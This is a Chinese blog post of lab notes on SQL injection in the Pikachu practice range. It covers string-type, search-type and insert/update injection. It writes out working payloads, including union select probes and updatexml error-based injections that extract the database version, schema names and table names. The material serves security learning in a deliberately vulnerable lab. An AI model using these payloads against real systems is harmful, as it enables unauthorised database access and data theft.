SQL注入(二):字符型+搜索型+ XX型+insert/update

已于 2023-07-19 15:49:15 修改
阅读量373 收藏 1
点赞数
分类专栏: 渗透 文章标签: sql 数据库
于 2023-07-19 15:46:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/131808164
版权

 SQL注入步骤:

1、使用 ' 进行测试

2、使用order by 测试有几个字段

3、使用union select 1,2 查看字段

一、字符型注入

pikachu靶场字符型:

1' union select 1,2#

1' union select 1,2'

二、搜索型注入

pikachu靶场搜索型:

a%' order by 3#

 使用 ' 出现语法错误,提示有%

 使用%

证明格式没有出错

检测有几个字段

 出错证明字段没有5个

成功:

三、XX型注入

pikachu靶场xx型:

') order by 2--+

输入' 进行测试

 发现出现语法错误,在输入其他符号进行测试

成功:(不报语法错误)

 

使用order by 测试有几个字段

抓包,在brup上进行URL编码:

四、insert/update注入:(表单提交)

获取版本号:

admin' or updatexml(2,concat(0x7e,(version())),0) or '

获取库名:

123'and updatexml(2,concat(0x7e,(select schema_name from information_schema.schemata limit 3,1)),0),2,3,4,5,6#

获取表名:

123'and updatexml(2,concat(0x7e,(select table_name from information_schema.tables where table_schema='mysql' limit 3,1)),0),2,3,4,5,6)#

updatexml:遇到错误会抛出

concat:拼接多个字符串

报错注入常用函数:

updatexml()

updatexml()函数作用:改变(查找并替换)XML文档中符合条件的节点的值。

语法:UPDATEXML(xml document,XPathstring,new_value)

Serein_NSQ
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu之搜索注入
weixin_43622525的博客
03-07 6842
目录 pikachu 简介 搭建 windows Docker SQL注入 搜索注入 pikachu 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 搭建 windows 搭建phpstudy环境,将pikachu解压在网站根目录进行搭建。 Docker docker build -t "pikachu" . docker run
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 2514
pikachu靶场通关之sql注入
SQL注入搜索注入
qxx5203的博客
07-22 2593
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字还是字符。账号密码错误或用户未注册!搜索框内输入a正常回显。...
SQL注入常见类注入点的判断
最新发布
qq_64395221的博客
05-15 859
字符注入的时候我们需要逃逸单引号,但是php提供了魔术引号开关magic_quotes_gpc和addslashes(),iconv()函数作为防御,特点是自动给传入的参数如单引号,双引号,反斜杠,%00前面加一个反斜杠,进行转义,避免单引号进行逃逸。id=1这种形式的url,这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常,and 1=2回显不正常的情况。sql语句的变量并不是直接传入的变量,而是通过其它的方式保存到了数据库,形成注入
SQL注入系列之PHP+Mysql手动注入(三)----搜索(POST/GET)
热门推荐
fendo
02-26 1万+
一、搜索注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
pikachu靶场--SQL inject--数字(post)/字符(get)/搜索/xx注入【4.1】~【4.4】
lmei1228的博客
06-10 779
当我们输入字符的时候,正常情况下,后台会给输入的字符+单引号,把他作为一个整个的字符串来处理,所以我们如果输入的是kobe or 1 = 1,传到后台的时候,or 1 = 1就不会起作用了,因此我们要构造闭合,输入kobe’ or 1 = 1#(#用--替换也可以,都是有着注释的意思,把后面的单引号注释掉),可以看到,它也能实现遍历。首先,打开我们的mysql数据库,use pikachu,然后对表“member”做查询,可以看到当参数为“1”和“1 or 1=1”时,所查询到的结果时大不相同的。
Pickachu第四弹:SQL注入
Pisces_mango的博客
09-03 1099
目录 一、数字注入(post) 字符输入(get) 三、搜索注入 四、xx注入 五、“insert/update注入 六、“delete”注入 七、“http header”注入 八、盲注(base on boolian) 九、盲注(base on time) 十、宽字节注入 十一、手工测试流程 十、报错利用流程 一、数字注入(post) 看到输入点后,我们想象一下它在数据库中是怎样操作的,select 字段1,字段2 from 表名 where id=1
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4916
sql注入详解
MySQL中浮点字符可能会遇的问题详解
12-16
在MySQL数据库操作中,将浮点数据转换为字符时可能会遇到精度丢失或额外小数位数出现的问题。这主要是由于浮点数据在计算机内部的存储方式导致的。浮点数据(如`FLOAT`和`DOUBLE`)在内存中是以进制形式...
VB+SQL宿舍管理系统(论文+源代码)
12-21
这包括SELECT用于查询,INSERT用于插入新数据,UPDATE用于修改已有数据,以及DELETE用于删除数据等。 4. **数据验证**:系统在接收用户输入时,需要进行数据验证,防止非法数据的录入。例如,宿舍号应为数字,入住...
sqlapi_oracle.rar_SQLAPI_oracle_sqlapi++
09-24
`SQLAPI++`是一个轻量级且跨平台的数据库接口,它允许开发者通过统一的API来访问多种关系数据库,如Oracle、MySQLSQL Server等。它的设计目标是简化数据库编程,提供一套简洁易用的接口,让开发者无需关注底层...
VBA+SQLServer跨电脑读写数据传输.zip
09-03
例如,使用`Execute`方法来执行`SELECT`查询以获取数据,或使用`Execute`方法执行`INSERT`、`UPDATE`或`DELETE`语句来修改数据。 4. **处理结果集**:如果你的SQL语句返回了结果集,你可以使用Recordset对象来接收...
xuejiguanli.rar_DELPHI+SQL_DelPhi SQl
09-23
比如,使用 SELECT 语句进行数据查询,INSERT 语句添加新记录,UPDATE 更新已有数据,DELETE 删除不再需要的信息。此外,还可以使用事务处理确保数据的一致性。 5. 数据验证:在学生信息录入和修改过程中,需要进行...
常见的web漏洞之 sql注入
weixin_47399833的博客
11-17 1572
简单学习一下网络安全啦
一文了解pikachu的SQL注入
allintao的博客
03-01 2670
本文章主要讲解关于pikachu的注入方式。目录一、数字注入(post)字符注入(get)三、搜索注入四、xx注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
Pikachu(皮卡丘)靶场中SQL注入
剁椒鱼头没剁椒的博客
12-14 4954
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
pikachu之SQL注入
莫黎小天
06-04 1512
一、数字注入(post传参–需要抓包): 操作如图,用代理在burp suit抓包,并转入repeater 发现存在id,在id那里输入做测试: 简单判断方法: 1' 、 " 、) 、 ')、 ") 是否报错 1' and 1=1 ' and 1=2 判断返回是否有差异 1' or 1=1 ' or 1=2 判断返回是否有差异 注意:还可以进行的操作有: 1.判断语句中的列数,union查询中不能超过全面的列数。 1' order by 3
SQL注入——搜索注入
zjdda的博客
05-30 7191
搜索注入原理 语句构造
pikachu靶场之SQL注入
2201_75766364的博客
03-28 852
程序员在编写web程序时,没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库sql语句的执行结 果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或 系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。
怎么判断判断字符注入还是数字注入
07-08
判断字符注入和数字注入的方法一般是根据输入的数据类进行判断。在大多数编程语言和数据库中,字符注入是通过在输入中插入特殊字符字符串来实现的,而数字注入则是通过在输入中插入恶意的数值来实现的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值